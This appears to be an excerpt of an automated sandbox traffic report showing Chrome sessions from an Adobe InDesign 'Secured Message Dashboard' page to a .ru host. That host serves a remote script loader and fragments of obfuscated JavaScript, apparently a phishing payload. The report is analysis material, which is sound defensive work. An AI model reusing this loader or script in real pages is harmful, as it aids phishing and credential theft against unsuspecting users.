                                                                                                                                                                                                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                              Server: ESF
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC4INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 11["gaia.l.a.r",[]]
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC4INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              30192.168.2.164977763.140.38.180443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:24 UTC531OUTGET /b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s57943804281193?AQB=1&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A21%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&pageName=indd.adobe.com%3ADocViewer%3AInsertHTMLSnippetsWithoutIFrame&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&ch=indd.adobe.com&c1=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&v1=D%3Dc1&c2=1&v2=D%3Dc2&c3=1&v3=D%3Dc3&v4=D%3Dc4&c5=792px&v5=D%3Dc5&c6=612px&v6=D%3Dc6&v7=D%3Dc7&v8=D%3Dc8&c9=Secured%20Message%20Dashboard&v9=D%3Dc9&c10=false&v10=D%3Dc10&c11=false&v11=D%3Dc11&v12=D%3Dc12&v13=D%3Dc13&c14=&v14=D%3Dc14&v15=D%3Dc15&v16=D%3Dc16&c17=true&v17=D%3Dc17&v41=D%3Dc41&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: sstats.adobe.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Referer: https://indd.adobe.com/
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: s_fid=31A41D21EBE6E61C-3B51C91A92692506; s_cc=true; s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              31192.168.2.164977863.140.38.186443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:24 UTC532OUTGET /b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s52012643213516?AQB=1&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A21%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&pageName=indd.adobe.com%3ADocViewer%3AIFrameSrcURLs&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&ch=indd.adobe.com&c1=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&v1=D%3Dc1&c2=1&v2=D%3Dc2&c3=1&v3=D%3Dc3&v4=D%3Dc4&c5=792px&v5=D%3Dc5&c6=612px&v6=D%3Dc6&v7=D%3Dc7&v8=D%3Dc8&c9=Secured%20Message%20Dashboard&v9=D%3Dc9&c10=false&v10=D%3Dc10&c11=false&v11=D%3Dc11&v12=D%3Dc12&v13=D%3Dc13&c14=&v14=D%3Dc14&v15=D%3Dc15&v16=D%3Dc16&c17=true&v17=D%3Dc17&v41=D%3Dc41&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: sstats.adobe.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: s_fid=31A41D21EBE6E61C-3B51C91A92692506; s_cc=true; s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              3263.140.38.180443192.168.2.1649777C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:24 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                              date: Wed, 25 Oct 2023 16:27:24 GMT
                                                                                                                                                                                                                                                                                                              expires: Tue, 24 Oct 2023 16:27:24 GMT
                                                                                                                                                                                                                                                                                                              last-modified: Thu, 26 Oct 2023 16:27:24 GMT
                                                                                                                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                                                                                                                              p3p: CP="This is not a P3P policy"
                                                                                                                                                                                                                                                                                                              server: jag
                                                                                                                                                                                                                                                                                                              set-cookie: s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]; Path=/; Domain=adobe.com; Max-Age=63072000; Expires=Fri, 24 Oct 2025 16:27:27 GMT;
                                                                                                                                                                                                                                                                                                              etag: 3646966778320224256-4617923706477384053
                                                                                                                                                                                                                                                                                                              vary: *
                                                                                                                                                                                                                                                                                                              content-type: image/gif;charset=utf-8
                                                                                                                                                                                                                                                                                                              content-length: 43
                                                                                                                                                                                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                              cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                                                                              x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:24 UTC534INData Raw: 47 49 46 38 39 61 02 00 02 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 02 00 02 00 00 02 02 84 51 00 3b
                                                                                                                                                                                                                                                                                                              Data Ascii: GIF89a!,Q;


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              3363.140.38.186443192.168.2.1649778C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:24 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                              date: Wed, 25 Oct 2023 16:27:24 GMT
                                                                                                                                                                                                                                                                                                              expires: Tue, 24 Oct 2023 16:27:24 GMT
                                                                                                                                                                                                                                                                                                              last-modified: Thu, 26 Oct 2023 16:27:24 GMT
                                                                                                                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                                                                                                                              p3p: CP="This is not a P3P policy"
                                                                                                                                                                                                                                                                                                              server: jag
                                                                                                                                                                                                                                                                                                              set-cookie: s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]; Path=/; Domain=adobe.com; Max-Age=63072000; Expires=Fri, 24 Oct 2025 16:27:27 GMT;
                                                                                                                                                                                                                                                                                                              etag: 3646966777271877632-4617754507851324857
                                                                                                                                                                                                                                                                                                              vary: *
                                                                                                                                                                                                                                                                                                              content-type: image/gif;charset=utf-8
                                                                                                                                                                                                                                                                                                              content-length: 43
                                                                                                                                                                                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                              cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                                                                              x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:24 UTC535INData Raw: 47 49 46 38 39 61 02 00 02 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 02 00 02 00 00 02 02 84 51 00 3b
                                                                                                                                                                                                                                                                                                              Data Ascii: GIF89a!,Q;


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              34192.168.2.164978163.140.38.186443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:24 UTC535OUTGET /b/ss/adbadobeinddprod/1/JS-1.4.2-D56H/s57943804281193?AQB=1&ndh=1&pf=1&t=25%2F9%2F2023%2018%3A27%3A21%203%20-120&D=D%3D&fid=31A41D21EBE6E61C-3B51C91A92692506&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&pageName=indd.adobe.com%3ADocViewer%3AInsertHTMLSnippetsWithoutIFrame&g=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&ch=indd.adobe.com&c1=https%3A%2F%2Findd.adobe.com%2Fview%2Fe174e561-569a-48e3-8548-c6c6e174aa25&v1=D%3Dc1&c2=1&v2=D%3Dc2&c3=1&v3=D%3Dc3&v4=D%3Dc4&c5=792px&v5=D%3Dc5&c6=612px&v6=D%3Dc6&v7=D%3Dc7&v8=D%3Dc8&c9=Secured%20Message%20Dashboard&v9=D%3Dc9&c10=false&v10=D%3Dc10&c11=false&v11=D%3Dc11&v12=D%3Dc12&v13=D%3Dc13&c14=&v14=D%3Dc14&v15=D%3Dc15&v16=D%3Dc16&c17=true&v17=D%3Dc17&v41=D%3Dc41&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&AQE=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: sstats.adobe.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: s_fid=31A41D21EBE6E61C-3B51C91A92692506; s_cc=true; s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              3563.140.38.186443192.168.2.1649781C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:24 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                              date: Wed, 25 Oct 2023 16:27:24 GMT
                                                                                                                                                                                                                                                                                                              expires: Tue, 24 Oct 2023 16:27:24 GMT
                                                                                                                                                                                                                                                                                                              last-modified: Thu, 26 Oct 2023 16:27:24 GMT
                                                                                                                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                                                                                                                              p3p: CP="This is not a P3P policy"
                                                                                                                                                                                                                                                                                                              server: jag
                                                                                                                                                                                                                                                                                                              set-cookie: s_vi=[CS]v1|329CA0F3A19B75CA-60000BAF437DAE53[CE]; Path=/; Domain=adobe.com; Max-Age=63072000; Expires=Fri, 24 Oct 2025 16:27:27 GMT;
                                                                                                                                                                                                                                                                                                              etag: 3646966777680789504-4617492538465360542
                                                                                                                                                                                                                                                                                                              vary: *
                                                                                                                                                                                                                                                                                                              content-type: image/gif;charset=utf-8
                                                                                                                                                                                                                                                                                                              content-length: 43
                                                                                                                                                                                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                              cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                                                                              x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:24 UTC537INData Raw: 47 49 46 38 39 61 02 00 02 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 02 00 02 00 00 02 02 84 51 00 3b
                                                                                                                                                                                                                                                                                                              Data Ascii: GIF89a!,Q;


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              36192.168.2.1649785104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:36 UTC537OUTGET /ynabwktmc HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                              Referer: https://indd.adobe.com/
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              37104.21.0.95443192.168.2.1649785C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:36 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:36 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=e5egGN6RinT%2B34g2P7DBzvPf9Nby4Us%2BdXqNwc%2BvwES4lgGLWDUyGtSy6%2B4ZwQTz2VQhD8AXf1HwTKiZXUsy97UjVQivceS6BUgjoFr5ILnwes3%2B7sUTyfmbJpypU%2B8V21p2JWMGtCtAwrJB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd3f11f9128a6-IAD
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:36 UTC538INData Raw: 34 62 30 0d 0a 3c 68 74 6d 6c 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 78 6d 61 69 79 70 6d 66 75 79 74 2e 68 6f 6c 64 62 69 74 63 6f 2e 72 75 2f 6d 79 73 63 72 32 32 39 38 33 38 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6a 73 20 3d 20 22 77 69 6e 64 6f 77 5b 27 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 27 5d 3d 7b 72 3a 27 38 31 62 62 64 33 66 31 31 66 39 31 32 38 61 36 27 2c 74 3a 27 4d 54 59 35 4f 44 49 31 4d 54 49 31 4e 69 34 33 4e 6a 67 77 4d 44 41 3d 27 7d 3b 5f 63 70 6f 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 5f 63 70
                                                                                                                                                                                                                                                                                                              Data Ascii: 4b0<html><script language="Javascript" src="https://yxmaiypmfuyt.holdbitco.ru/myscr229838.js"></script><script>(function(){var js = "window['__CF$cv$params']={r:'81bbd3f11f9128a6',t:'MTY5ODI1MTI1Ni43NjgwMDA='};_cpo=document.createElement('script');_cp
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:36 UTC539INData Raw: 5f 30 78 69 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 5f 30 78 6a 29 3b 7d 7d 69 66 20 28 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 20 21 3d 3d 20 27 6c 6f 61 64 69 6e 67 27 29 20 7b 68 61 6e 64 6c 65 72 28 29 3b 7d 20 65 6c 73 65 20 69 66 20 28 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 68 61 6e 64 6c 65 72 29 3b 7d 20 65 6c 73 65 20 7b 76 61 72 20 70 72 65 76 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 20 7c 7c 20 66 75 6e 63 74 69
                                                                                                                                                                                                                                                                                                              Data Ascii: _0xi.getElementsByTagName('head')[0].appendChild(_0xj);}}if (document.readyState !== 'loading') {handler();} else if (window.addEventListener) {document.addEventListener('DOMContentLoaded', handler);} else {var prev = document.onreadystatechange || functi
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:36 UTC540INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              38192.168.2.1649784104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:36 UTC540OUTGET /myscr229838.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              39104.21.0.95443192.168.2.1649784C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:37 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                              Content-Length: 27866
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 17 Oct 2023 20:21:53 GMT
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kFdtiA9nlKQsHvP%2Ba0d%2BbPaLjK2l37p2lCm2wguxpBd%2B3Kdtk3SO%2FeameIFP9jAQj5nq3v2%2FpNmiVEnYOeD6mjPaGC3IOcWV5KztIjIYYFW1qk6HX3Um%2FPF5ZVkmf%2FgM9w9fNmBY%2BfxHhYwv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd3f38b9c82d5-IAD
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC541INData Raw: 76 61 72 20 65 72 70 20 3d 20 6e 65 77 20 41 72 72 61 79 3b 0a 65 72 70 5b 30 5d 20 3d 20 31 30 30 38 38 31 33 31 33 35 3b 0a 65 72 70 5b 31 5d 20 3d 20 31 31 32 39 36 30 31 33 36 30 3b 0a 65 72 70 5b 32 5d 20 3d 20 31 31 35 39 37 35 31 37 39 36 3b 0a 65 72 70 5b 33 5d 20 3d 20 31 38 33 35 38 31 30 33 31 37 3b 0a 65 72 70 5b 34 5d 20 3d 20 31 37 31 37 33 31 30 36 30 3b 0a 65 72 70 5b 35 5d 20 3d 20 31 38 33 35 38 30 32 37 33 32 3b 0a 65 72 70 5b 36 5d 20 3d 20 31 36 33 34 36 32 35 33 34 31 3b 0a 65 72 70 5b 37 5d 20 3d 20 35 37 37 30 37 32 36 37 34 3b 0a 65 72 70 5b 38 5d 20 3d 20 31 30 34 31 30 34 31 39 38 30 3b 0a 65 72 70 5b 39 5d 20 3d 20 31 37 35 31 34 37 34 35 33 32 3b 0a 65 72 70 5b 31 30 5d 20 3d 20 31 30 34 31 30 34 31 39 35 32 3b 0a 65 72 70 5b
                                                                                                                                                                                                                                                                                                              Data Ascii: var erp = new Array;erp[0] = 1008813135;erp[1] = 1129601360;erp[2] = 1159751796;erp[3] = 1835810317;erp[4] = 171731060;erp[5] = 1835802732;erp[6] = 1634625341;erp[7] = 577072674;erp[8] = 1041041980;erp[9] = 1751474532;erp[10] = 1041041952;erp[
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC542INData Raw: 30 35 38 3b 0a 65 72 70 5b 33 31 5d 20 3d 20 31 37 36 38 39 37 37 34 34 30 3b 0a 65 72 70 5b 33 32 5d 20 3d 20 31 39 33 36 38 37 36 33 34 39 3b 0a 65 72 70 5b 33 33 5d 20 3d 20 35 37 37 32 37 30 39 30 30 3b 0a 65 72 70 5b 33 34 5d 20 3d 20 31 38 38 36 35 39 39 37 32 37 3b 0a 65 72 70 5b 33 35 5d 20 3d 20 37 39 35 30 34 33 39 33 37 3b 0a 65 72 70 5b 33 36 5d 20 3d 20 31 38 31 39 30 34 33 31 38 32 3b 0a 65 72 70 5b 33 37 5d 20 3d 20 31 37 33 34 37 30 31 38 37 30 3b 0a 65 72 70 5b 33 38 5d 20 3d 20 31 36 36 38 30 35 30 38 30 35 3b 0a 65 72 70 5b 33 39 5d 20 3d 20 31 36 38 34 34 33 34 30 31 37 3b 0a 65 72 70 5b 34 30 5d 20 3d 20 31 39 31 39 32 33 33 36 33 35 3b 0a 65 72 70 5b 34 31 5d 20 3d 20 31 38 36 39 34 32 36 35 34 38 3b 0a 65 72 70 5b 34 32 5d 20 3d 20
                                                                                                                                                                                                                                                                                                              Data Ascii: 058;erp[31] = 1768977440;erp[32] = 1936876349;erp[33] = 577270900;erp[34] = 1886599727;erp[35] = 795043937;erp[36] = 1819043182;erp[37] = 1734701870;erp[38] = 1668050805;erp[39] = 1684434017;erp[40] = 1919233635;erp[41] = 1869426548;erp[42] =
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:37 UTC543INData Raw: 37 31 30 33 30 34 3b 0a 65 72 70 5b 39 34 5d 20 3d 20 35 33 38 39 37 36 33 37 34 3b 0a 65 72 70 5b 39 35 5d 20 3d 20 31 36 33 34 38 36 39 33 36 33 3b 0a 65 72 70 5b 39 36 5d 20 3d 20 31 36 36 38 34 34 32 34 38 30 3b 0a 65 72 70 5b 39 37 5d 20 3d 20 31 39 35 30 37 30 36 37 38 39 3b 0a 65 72 70 5b 39 38 5d 20 3d 20 31 38 33 35 33 36 33 39 35 36 3b 0a 65 72 70 5b 39 39 5d 20 3d 20 31 37 35 31 34 37 34 35 33 32 3b 0a 65 72 70 5b 31 30 30 5d 20 3d 20 31 39 35 33 34 36 30 32 35 36 3b 0a 65 72 70 5b 31 30 31 5d 20 3d 20 31 30 32 35 35 33 33 30 33 39 3b 0a 65 72 70 5b 31 30 32 5d 20 3d 20 31 36 36 38 36 34 30 31 30 31 3b 0a 65 72 70 5b 31 30 33 5d 20 3d 20 31 38 35 33 31 30 37 38 31 31 3b 0a 65 72 70 5b 31 30 34 5d 20 3d 20 31 39 31 39 32 34 36 37 30 38 3b 0a 65
